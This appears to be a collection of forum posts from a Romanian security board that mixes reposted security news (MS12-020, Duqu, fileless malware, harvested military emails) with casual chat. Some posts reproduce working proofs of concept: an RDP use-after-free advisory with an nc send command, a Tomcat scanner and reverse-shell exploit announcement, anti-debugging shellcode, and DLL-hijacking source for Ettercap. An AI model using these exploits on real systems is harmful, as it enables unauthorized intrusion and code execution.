Nytro

Cyber Criminals Selling Millions of U.S military email addresses Web based underground market service currently selling Millions of harvested U.S government and U.S military harvested emails addresses to potential spammers, and find out just how easy it is to purchase that kind of data within the cyber crime ecosystem. Cyber criminals are getting more sophisticated in their scams and phishing schemes, which are designed to steal personal data and financial information. Spammers and virus creators are motivated by money and backed by organized crime on a global scale. They are also launching massive attacks on anti-spam organizations in an attempt to bring them down. In respect to targeted malware attacks, the service is currently offering 2.462.935 U.S government email addresses, and another 2.178.000 U.S military email addresses. A Screenshot of the inventory of harvested emails currently offered for sale: Spammers buy lists from brokers that continuously harvest email addresses from newsgroups, chat rooms, web sites, Internet directories, and more. Spammers also run dictionary attacks, throwing billions of combinations of words and numbers at an email database to find valid address combinations. People are being tricked by email phishing scams that masquerade as legitimate business communications from their bank, mortgage provider, credit card company, PayPal, or eBay. Other popular spam-based Internet scams include foreign lotteries, investment schemes, chain letters, credit repair offers, advance-fee loan deals, check overpayment cons, and work-at-home ploys. U.S government and U.S military users whose emails have been exposed are advised to be extra vigilant for potential targeted malware attacks enticing them into downloading and executing a malicious attachment, or attempting to trick them into clicking on a client-side exploits serving link found in the emails. [Source] Sursa: Cyber Criminals Selling Millions of U.S military email addresses | The Hacker News (THN)

iPad 3 jailbroken on Launch Day by 3 ways The new Apple iPad (third iPad, iPad 3) has already been jailbroken in at least three different ways. On the same day that Apple started shipping the new iPad out to consumers, there were reports that at least one hacker had already jailbroken the latest tablet. The first to claim was @Musclenerd, a member of the iPhone Dev Team, tweeted a couple of images showing that he had already jailbroken the device. This must be a great relief for Apple fans who want to have their Apple devices, but don’t want Cupertino based tech giant to keep it restricted as it wants. Within the 24 hours of the iOS 5.1 update, teammate @pod2g revealed an untethered jailbreak for the iPad 2 and iPhone 4S. With the new iPad running iOS 5.1 and an A5X processor. His hack was followed by the announcement of a successful untethered jailbreak by teammate, @i0n1c, who released a video as evidence to his accomplishment: Finally, a Tweet by @chpwn and @phoenixdev have revealed a third successful jailbreak, and accompanying photos of the jailbroken new iPad running the Cydia Store: “Jailbroken iPad (3), using a different method by myself and @phoenixdev: http://db.tt/mqIZmw96 http://db.tt/g2UlawxV” Jailbreaking an iPhone, iPod touch, or iPad makes it possible to install apps that aren’t available in Apple’s App Store, among other goodies. Hacking or jailbreak of Apple devices was deemed illegal by officials in the US and hence. Jailbreaking devices so that it can run third-party software, was made legal in the year 2010 by the U.S. Copyright Office. However, that exemption is set to expire, and the Electronic Frontier Foundation (EFF) is asking people to lobby so that jailbreaking will continue to be protected by law. Sursa: iPad 3 jailbroken on Launch Day by 3 ways | The Hacker News (THN)

Kaspersky finds Malware that resides in your RAM Kaspersky Lab researchers have discovered a drive-by download attack that evades hard-drive checkers by installing malware that lives in the computer's memory. The 'fileless' bot is more difficult for antivirus software to detect, and resides in memory until the machine is rebooted. This Malware doesn't create any files on the affected systems was dropped on to the computers of visitors to popular news sites in Russia in a drive-by download attack.Drive-by download attacks are one of the primary methods of distributing malware over the web. They usually exploit vulnerabilities in outdated software products to infect computers without requiring user interaction. The attack code loaded an exploit for a known Java vulnerability (CVE-2011-3544), but it wasn't hosted on the affected websites themselves. Once the malware infected a Microsoft machine, the bot disabled User Account Control, contacted a command and control server and downloaded the 'Lurk' Trojan. The malware also attacked Apple devices. The Java exploit's payload consisted of a rogue DLL that was loaded and attached on the fly to the legitimate Java process.Normally this malware is rare, because it dies when the system is rebooted and the memory is cleared. But the hackers do not really care because there is a good chance that most victims would revisit the infected news websites.Once the malicious DLL loaded into memory it sends data and receives instructions from a command and control server over HTTP. Sursa: Kaspersky finds Malware that resides in your RAM | The Hacker News (THN)

Finan?atorul Pirate Bay a fost condamnat la monitorizare electronic? La începutul lunii, procurorii suedezi au lansat o nou? anchet? împotriva site-ului de sharing Pirate Bay. În 2009, Carl Lundström, împreun? cu fondatorii Gottfrid Svartholm Warg, Peter Sunde ?i Fredrik Neij, au fost condamna?i la câte un an de închisoare pentru complicitate la violarea drepturilor de copyright ?i au primit o amend? combinat? de 30 de milioane de coroane (4,4 milioane de dolari). To?i patru au f?cut recurs, îns? Curtea de Apel a decis în 2010 s? p?streze sentin?ele, exceptându-l pe Svartholm Warg, care a fost absent pe motiv de boal?. Tot atunci, sentin?a lui Carl Lundström, care a devenit foarte bogat dup? vânzarea companiei produc?toare de pâine a bunicului s?u, Karl Lundström, a fost redus? de la 1 an la 4 luni, iar milionarul a fost somat s?-?i pl?teasc? partea de 6,78 milioane de dolari.Cei trei pira?i r?ma?i au trimis apoi o peti?ie Cur?ii Supreme din Suedia, îns? aceasta a anun?at, în februarie 2012, c? le-a refuzat cererea ?i c? decizia Cur?ii de Apel r?mâne în picioare. Site-ul piratebay.org nu a putut fi accesat o vreme, vizitatorii fiind redirec?iona?i spre o nou? adres?, thepiratebay.se, domeniu înregistrat la compania suedez? Binero de c?tre Fredrik Neij.Acum, Carl Lundström, care va împlini 52 de ani luna viitoare, este preg?tit s?-?i execute sentin?a, îns? nu în închisoare. Legea suedez? permite oric?rei persoane condamnate la mai pu?in de ?ase luni în închisoare s? aplice pentru a lucra în folosul comunit??ii. Lundström a ales aceast? cale, iar solicitarea i-a fost aprobat?. Omul de afaceri î?i va p?r?si locuin?a din Elve?ia ?i se va întoarce în Suedia, unde va petrece patru luni sub monitorizare electronic? într-un apartament din ora?ul Gothenburg. Îl va putea p?r?si doar pentru a merge la un job aranjat de autorit??ile suedeze, având un program strict. De?i Lundström este obligat s? pl?teasc? cele 6,78 milioane de dolari, autorit??ile suedeze au reu?it s? g?seasc? bunuri în valoare de doar 33.149 de dolari. Ceilal?i trei condamna?i, Fredrik Neij, Peter Sunde ?i Gottfrid Svartholm urmeaz? s? fie informa?i despre modalitatea în care î?i vor executa sentin?a. Nici unul dintre ei nu locuie?te în prezent în Suedia, iar despre Svartholm, de la care nimeni n-a mai primit ve?ti de mult? vreme, exist? suspiciunea c? ar fi murit între timp.Foto: Flickr/SigNote Cloud Sursa: http://totb.ro/finantatorul-pirate-bay-a-fost-condamnat-la-monitorizare-electronica

#include <iostream> #include <cstdlib> #include <ctime> using namespace std; cout<<endl<<endl; Deci e .C ?

Da, dar se pot intampla si multe chestii aiurea, eu primam BSOD de 7-8 ori pe zi. Bine, nu sunt genu "ba, iau BSOD, cumpara-mi alt calculator", dar a trecut ceva timp sa imi dau seama ca problema era de la un driver pentru portul serial... La fel sunt problemele cu "nu merge reteaua". Stiu ca pusesem EU un cablu de telefon aiurea, si se forma o bucla infinita, si reteaua merge putin, pica, iar mergea putin, iar pica... Si nu e neaparat usor sa iti dai seama de asta.

E oarecum mai lejer ca sysadmin, ai mult timp liber, dar apar probleme ca "Ba, nu imi merge calculatorul, ce sa ii fac?", sau daca se intampla ceva la 02:00 AM ar cam trebui sa mergi sa rezolvi problema, sysadminii de la mine au venit sambata si duminica sa configureze reteaua dupa ce au pus mai multe servere, sau lucrau seara de dupa program pana noaptea pe la 03:00.

Mystery of Duqu Programming Language Solved An appeal for help from the programming community has allowed antivirus analysts to classify the unknown language used to develop key components of the Duqu Trojan. The sections responsible for downloading and executing additional modules in the Duqu Trojan, referred to by some as Stuxnet 2.0, were written in standard C++. Kaspersky Lab experts now say with a high degree of certainty that the Duqu framework was written using a custom object-oriented extension to C, generally called “OO C” and compiled with Microsoft Visual Studio Compiler 2008 (MSVC 2008) with special options for optimizing code size and inline expansion. Kaspersky’s Igor Soumenkov wrote, “No matter which of these two variants is true, the implications are impressive. The Payload DLL contains 95 Kbytes of event-driven code written with OO C, a language that has no automatic memory management or safe pointers,”. Kaspersky’s analysis now concludes: The Duqu Framework consists of “C” code compiled with MSVC 2008 using the special options “/O1? and “/Ob1? The code was most likely written with a custom extension to C, generally called “OO C” The event-driven architecture was developed as a part of the Duqu Framework or its OO C extension The C&C code could have been reused from an already existing software project and integrated into the Duqu Trojan The Duqu Framework may have been created by a different programming team, since it is unique to Duqu, unlike many parts of Duqu that seem to be directly borrowed from Stuxnet. It’s believed that the developers are old school that don’t trust C++ and that’s probably why they relied on C. Another reason for using OO C is because back in the good old days it was more portable than C++. Knowing the techniques used to develop the malware allows Kaspersky's researchers to make better guesses about who might be behind the code. Creating Duqu was a major project, so it’s possible that an entirely different team was responsible for creating the Duqu Framework, while others worked on creating drivers and system infection exploits. In this scenario it's even possible that those who created the Duqu framework were ignorant of the real purpose of their work. Duqu was first detected in September 2011, but Kaspersky Lab believes it has seen the first pieces of Duqu-related malware dating back to August 2007. The Russian security firm also notes Duqu, like Stuxnet before it, is highly targeted and related to Iran’s nuclear program. Sursa: Mystery of Duqu Programming Language Solved | The Hacker News (THN)

[h=1]Apache Tomcat Remote Exploit (PUT Request) and Account Scanner[/h] ISOWAREZ RELEASEBy KINGCOPE - YEAR 2012 -== Apache Tomcat Remote Exploit and Account Scanner ==- the modified pnscan scanner utility scans a range of IPs to find open apache tomcat servers by trying the following login access combinations: tomcat:tomcat password:password admin:admin admin:password admin:<nopassword> tomcat:<nopassword> the included perl script can be used to unlock apache tomcat servers remotely by using the collected login combinations. it will retrieve either a root or SYSTEM reverse shell depending on the operating system or the equivalent of a reverse shell as the current user tomcat is running as. the exploit might contain metasploit logic (thanks to jduck). Enjoy :> /Kingcope http://www.exploit-db.com/sploits/tomcat-remote.zip Sursa: Apache Tomcat Remote Exploit (PUT Request) and Account Scanner

Care parc? Izvor? Pana unde ai semnal acceptabil?

Exista pe un hosting chinezesc, dar nu am incercat.

Citeste tot...

Full disclosure ####################################################################### Luigi Auriemma Application: Microsoft Terminal Services / Remote Desktop Services http://www.microsoft.com http://msdn.microsoft.com/en-us/library/aa383015(v=vs.85).aspx Versions: any Windows version before 13 Mar 2012 Platforms: Windows Bug: use after free Exploitation: remote, versus server Date: 16 Mar 2012 (found 16 May 2011) Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org Additional references: http://www.zerodayinitiative.com/advisories/ZDI-12-044/ http://technet.microsoft.com/en-us/security/bulletin/ms12-020 ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From vendor's homepage: "The Microsoft Remote Desktop Protocol (RDP) provides remote display and input capabilities over network connections for Windows-based applications running on a server. RDP is designed to support different types of network topologies and multiple LAN protocols." ####################################################################### ====== 2) Bug ====== The Remote Desktop Protocol is used by the "Terminal Services / Remote Desktop Services" and works at kernel level on port 3389. There is an use-after-free vulnerability located in the handling of the maxChannelIds field of the T.125 ConnectMCSPDU packet (offset 0x2c of the provided proof-of-concept) when set to a value minor/equal than 5. The problem happens during the disconnection of the user started with RDPWD!NM_Disconnect while the effect of the possible code execution is visible in termdd!IcaBufferAlloc (or termdd!IcaBufferAllocEx on Windows 7/2008) after termdd!IcaGetPreviousSdLink returns an invalid memory pointer, the following dump is taken from Windows 2003 Server: f761887c 8bff mov edi,edi f761887e 55 push ebp f761887f 8bec mov ebp,esp f7618881 56 push esi f7618882 57 push edi f7618883 8b7d08 mov edi,dword ptr [ebp+8] f7618886 8d47ec lea eax,[edi-14h] f7618889 50 push eax f761888a eb09 jmp termdd!IcaBufferAlloc+0x19 (f7618895) f761888c 8b4618 mov eax,dword ptr [esi+18h] ; we are here f761888f 833800 cmp dword ptr [eax],0 ; or here f7618892 7527 jne termdd!IcaBufferAlloc+0x3f (f76188bb) ; must jump f7618894 56 push esi f7618895 e878290000 call termdd!IcaGetPreviousSdLink (f761b212) ; the new ESI is returned by this function f761889a 8bf0 mov esi,eax f761889c 85f6 test esi,esi f761889e 75ec jne termdd!IcaBufferAlloc+0x10 (f761888c) f76188a0 ff751c push dword ptr [ebp+1Ch] f76188a3 ff7518 push dword ptr [ebp+18h] f76188a6 ff7514 push dword ptr [ebp+14h] f76188a9 ff7510 push dword ptr [ebp+10h] f76188ac ff750c push dword ptr [ebp+0Ch] f76188af 57 push edi f76188b0 e8b9fcffff call termdd!IcaBufferAllocInternal (f761856e) f76188b5 5f pop edi f76188b6 5e pop esi f76188b7 5d pop ebp f76188b8 c21800 ret 18h f76188bb 33c0 xor eax,eax f76188bd 53 push ebx f76188be 8d7e10 lea edi,[esi+10h] f76188c1 40 inc eax f76188c2 f00fc107 lock xadd dword ptr [edi],eax f76188c6 ff751c push dword ptr [ebp+1Ch] f76188c9 8b4618 mov eax,dword ptr [esi+18h] ; the same value of before f76188cc ff7518 push dword ptr [ebp+18h] f76188cf ff7514 push dword ptr [ebp+14h] f76188d2 ff7510 push dword ptr [ebp+10h] f76188d5 ff750c push dword ptr [ebp+0Ch] f76188d8 ff761c push dword ptr [esi+1Ch] f76188db ff10 call dword ptr [eax] ; code execution f76188dd 8bd8 mov ebx,eax f76188df 83c8ff or eax,0FFFFFFFFh f76188e2 f00fc107 lock xadd dword ptr [edi],eax f76188e6 7506 jne termdd!IcaBufferAlloc+0x72 (f76188ee) f76188e8 56 push esi f76188e9 e8382f0000 call termdd!_IcaUnloadSd (f761b826) f76188ee 8bc3 mov eax,ebx f76188f0 5b pop ebx f76188f1 ebc2 jmp termdd!IcaBufferAlloc+0x39 (f76188b5) eax=040b0402 ebx=e1492090 ecx=00390080 edx=00000003 esi=040b0402 edi=e1438240 eip=f762888c esp=b832f9d8 ebp=b832f9e0 iopl=0 nv up ei pl nz na po nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202 termdd!IcaBufferAlloc+0x10: f762888c 8b4618 mov eax,dword ptr [esi+18h] ds:0023:040b041a=???????? ChildEBP RetAddr b8b399e0 b89c1c34 termdd!IcaBufferAlloc+0x10 b8b39a00 b89c1c67 RDPWD!StackBufferAlloc+0x26 b8b39a2c b89a902c RDPWD!MCSDetachUserRequest+0x29 b8b39a40 b89a8b44 RDPWD!NMDetachUserReq+0x14 b8b39a4c b89a9185 RDPWD!NM_Disconnect+0x16 b8b39a58 b89adcb4 RDPWD!SM_Disconnect+0x27 b8b39a68 b89a906d RDPWD!SM_OnConnected+0x70 b8b39a88 b89a8db4 RDPWD!NMAbortConnect+0x23 b8b39ac0 b89a9d88 RDPWD!NM_Connect+0x86 b8b39ae0 b89abcfc RDPWD!SM_Connect+0x112 b8b39b08 b89ac786 RDPWD!WDWConnect+0x368 b8b39b3c b89a6959 RDPWD!WDWConfConnect+0x94 b8b39b70 f762c1c7 RDPWD!WD_Ioctl+0x1227 b8b39b8c f762c5a3 termdd!_IcaCallSd+0x35 b8b39bac f762ca10 termdd!_IcaCallStack+0x55 b8b39bf4 f762abcc termdd!IcaDeviceControlStack+0x414 b8b39c24 f762ad20 termdd!IcaDeviceControl+0x4e b8b39c3c 8081d5c3 termdd!IcaDispatch+0x12a b8b39c50 808ed4eb nt!IofCallDriver+0x45 b8b39c64 808ee28d nt!NtWriteFile+0x2943 b8b39d00 808e6dbc nt!NtWriteFile+0x36e5 b8b39d34 80883968 nt!NtDeviceIoControlFile+0x2a b8b39d64 7c82847c nt!KeReleaseInStackQueuedSpinLockFromDpcLevel+0xb14 b8b39d68 badb0d00 ntdll!_NLG_Notify+0x14 On Windows 2003 that zone of the memory pointed by ESI+18 using the provided proof-of-concept is ever in the range 040b02??-040b04??. The exploitability depends by the possibility of controlling ESI or the content pointed by it (maybe via a form of heap spraying?), indeed in my quick tests this zone sometimes is allocated and others it isn't. Note that on the post-Vista Windows versions (like 7 and 2008) "seems" necessary to have "Allow connections from computers running any version of Remote Desktop" for being vulnerable. Anyway I'm not totally sure about this so-called limitation because it looks like dependent by my proof-of-concept only. The provided proof-of-concept uses the BER integer values set at 32bit (big endian) in case they could be useful for easier debugging. Additional details about the protocol: http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/termdd_1.dat http://www.exploit-db.com/sploits/18606.dat nc SERVER 3389 < termdd_1.dat resend it multiple times in case of no results and note that this is just a simple proof-of-concept packet to quickly test the bug so it's not optimized at all. ####################################################################### ====== 4) Fix ====== http://technet.microsoft.com/en-us/security/bulletin/ms12-020 ####################################################################### Luigi Auriemma FTW!

Imi cer scuze, e vina mea, am rezolvat problema.

Scrieti un mic programel C (cateva linii sunt de ajuns) care sa detecteze daca un procesor este little endian sau big endian. Cred ca stiti care e diferenta... Nu e greu deloc, raspunsurile pe PM. Au raspuns pana acum: - Ellimist - BGS - H3xoR - NemesisITSC - Matei

Nu vreau sa par un nenorocit, dar ma pis pe el si pe toata porcaria de Romanii au Talent.

Securitytube Speak Up: The Ms12-020 Fiasco! Suspicions aroused as exploit for critical Windows bug is leaked (Updated) http://aluigi.org/adv/ms12-020_leak.txt

IP-uri de Uzbekistan, Thailanda, Mali (nu am auzit de tara asta), Columbia si alte tari, IP-uri care se repeta. E posibil sa fie DDOS, dar e unul penibil si fara sanse de izbanda.

Toti pe index, ce cacat cauta? Au fost si 15.000, au mai fost mai mult de 1000, cine stie de ce...

Nu va construiti vise in functie de promisiuni de mariri, realitatea e ceva mai dura.

"si nu stiti ce mortii mamicutelor voastre inseamna un SVN, si google code" Ce cuvinte ai ales ca sa te dai destept...

Microsoft: Remote Desktop Protocol Vulnerability Should be Patched Immediately By Brian Prince on March 13, 2012 Microsoft is urging organizations to apply the sole critical update in this month’s Patch Tuesday release as soon as possible. The critical bulletin – one of six security bulletins issued as part of today’s release – addresses two vulnerabilities in the Remote Desktop Protocol (RDP). “A little about MS12-020…this bulletin addresses one Critical-class issue and one Moderate-class issue in Remote Desktop Protocol (RDP),” Angela Gunn, security response communications manager for Microsoft’s Trustworthy Computing Group, explained in a blog post. “Both issues were cooperatively disclosed to Microsoft and we know of no active exploitation in the wild. The Critical-class issue applies to a fairly specific subset of systems – those running RDP – and is less problematic for those systems with Network Level Authentication (NLA) enabled.” “That said, we strongly recommend that customers examine and prepare to apply this bulletin as soon as possible,” she added. “The Critical-class issue could allow a would-be attacker to achieve remote code execution on a machine running RDP (a non-default configuration); if the machine does not have NLA enabled, the attacker would not require authentication for RCE access.” Ben Greenbaum, senior principle software engineer for Symantec’s Security Intelligence Group, agreed users should pay close attention to the RDP vulnerability. “RDP’s purpose is to enable remote access from the Internet, but preferably to an authenticated user,” he said. “In this case, a malicious attacker can potentially take complete control of the computer. Failed exploit attempts of this issue will likely result in the user being confronted with the blue screen of death. If an attacker can bypass standard memory protection measures, however, they will have access at the kernel level.” Those IT admins who use RDP to manage their machines over the internet, which is essentially the default in cloud-based installations such as Amazon’s AWS, need to patch as quickly as possible, Qualys CTOWolfgang Kandek opined. “If the patch cannot be applied that quickly or the necessary reboot cannot be scheduled, IT Admins should look into the available work-arounds that function immediately: protect the machine with restrictive firewalling, access RDP through a VPN service or switch to Microsoft’s NLA protocol that is supported in newer versions of Windows (Vista+) and is not vulnerable to the attack,” he said. Besides the RDP bugs, this month’s Patch Tuesday addressed five other vulnerabilities: two denial-of-service bugs and an escalation of privileges issue in Microsoft Windows; a remote code execution vulnerability in Microsoft Expression Design; and an escalation of privileges issue in Microsoft Visual Studio. All those issues are rated ‘important’ with the exception of one of the Windows’ denial-of-service bugs, which is rated ‘moderate.’ Also today, Adobe updated its ColdFusion software to address a vulnerability in versions 9.0.1 and earlier for Windows, Macintosh and UNIX systems that could lead to a denial-of-service attack using a hash algorithm collision. The company said it was unaware of any attempts to exploit the vulnerability in the wild. Sursa: Microsoft: Remote Desktop Protocol Vulnerability Should be Patched Immediately | SecurityWeek.Com Via: Microsoft: RDP Vulnerability Should Be Patched Immediately - Slashdot

[h=1]win xp sp2 PEB ISbeingdebugged shellcode[/h] #name: win xp sp2 PEB ISbeingdebugged shellcode #Author: ********* #Contact: teo.manojlovic@skole.hr #Date: 14.12.2009. here is the ASM code made using masm32 if program is being run under debugger the shellcode wil start beeping //////////////////////begin/////////////////////////////////////// .386 .model flat, stdcall option casemap :none INCLUDE C:\MASM32\INCLUDE\WINDOWS.INC INCLUDE C:\MASM32\INCLUDE\KERNEL32.INC INCLUDE C:\MASM32\INCLUDE\USER32.INC INCLUDE C:\MASM32\INCLUDE\MASM32.INC INCLUDELIB C:\MASM32\LIB\KERNEL32.LIB INCLUDELIB C:\MASM32\LIB\USER32.LIB INCLUDELIB C:\MASM32\LIB\MASM32.LIB .data ExitMsg DB "Enter to Exit", 0 .code start: assume fs:nothing mov eax,fs:[30h] mov eax, [eax+02h] mov ebx, 7FFF8000h add ebx,7FFF8000h inc ebx push 300h push 200h mov edx,7c837a8fh cmp eax,ebx jnz exit call edx exit: invoke ExitProcess,NULL end start /////////////////////////////end/////////////////////////////// here is the dump of code using olly debugger 00401000 >/$ 64:A1 30000000 MOV EAX,DWORD PTR FS:[30] 00401006 |. 8B40 02 MOV EAX,DWORD PTR DS:[EAX+2] 00401009 |. BB 0080FF7F MOV EBX,7FFF8000 0040100E |. 81C3 0080FF7F ADD EBX,7FFF8000 00401014 |. 43 INC EBX 00401015 |. 68 00030000 PUSH 300 ; /Duration = 768. ms 0040101A |. 68 00020000 PUSH 200 ; |Frequency = 200 (512.) 0040101F |. BA 8F7A837C MOV EDX,kernel32.Beep ; | 00401024 |. 3BC3 CMP EAX,EBX ; | 00401026 |. 75 02 JNZ SHORT antidebu.0040102A ; | 00401028 |. FFD2 CALL EDX ; \Beep 0040102A |> 6A 00 PUSH 0 ; /ExitCode = 0 0040102C \. E8 01000000 CALL <JMP.&kernel32.ExitProcess> ; \ExitProcess 00401031 CC INT3 00401032 .-FF25 00204000 JMP DWORD PTR DS:[<&kernel32.ExitProcess>; kernel32.ExitProcess here is the shellcode \x64\xA1\x30\x00\x00\x00\x8B\x40\x02\xBB\x00\x80\xFF\x7F\x81\xC3\x00\x80\xFF\x7F\x43\x68\x00\x03\x00\x00\x68\x00\x02\x00\x00\xBA\x8F\x7A\x83\x7C\x3B\xC3\x75\x02\xFF\xD2\x6A\x00\xE8\x01\x00\x00\x00\xCC\xFF\x25\x00\x20\x40\x00 Sursa: win xp sp2 PEB ISbeingdebugged shellcode Anti-debugging eficient...

Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll) /* Exploit Title: Ettercap NG-0.7.3 DLL hijacking (wpcap.dll) Date: 25/08/2010 Author: ********* Tested on: Windows XP SP3 Vulnerable extensions: .pcap Compile and rename to wpcap.dll, create a file in the same dir .pcap extension and visit http://chaossecurity.wordpress.com/ */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void pcap_findalldevs() { evil(); } DLLIMPORT void pcap_close() { evil(); } DLLIMPORT void pcap_compile() { evil(); } DLLIMPORT void pcap_datalink() { evil(); } DLLIMPORT void pcap_datalink_val_to_description() { evil(); } DLLIMPORT void pcap_dump() { evil(); } DLLIMPORT void pcap_dump_close() { evil(); } DLLIMPORT void pcap_dump_open() { evil(); } DLLIMPORT void pcap_file() { evil(); } DLLIMPORT void pcap_freecode() { evil(); } DLLIMPORT void pcap_geterr() { evil(); } DLLIMPORT void pcap_getevent() { evil(); } DLLIMPORT void pcap_lib_version() { evil(); } DLLIMPORT void pcap_lookupdev() { evil(); } DLLIMPORT void pcap_lookupnet() { evil(); } DLLIMPORT void pcap_loop() { evil(); } DLLIMPORT void pcap_open_live() { evil(); } DLLIMPORT void pcap_open_offline() { evil(); } DLLIMPORT void pcap_setfilter() { evil(); } DLLIMPORT void pcap_snapshot() { evil(); } DLLIMPORT void pcap_stats() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; } Sursa: Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll) Am postat doar ca sa reamintesc acest "truc"...

Pff, nu stiu cum se cheama maneaua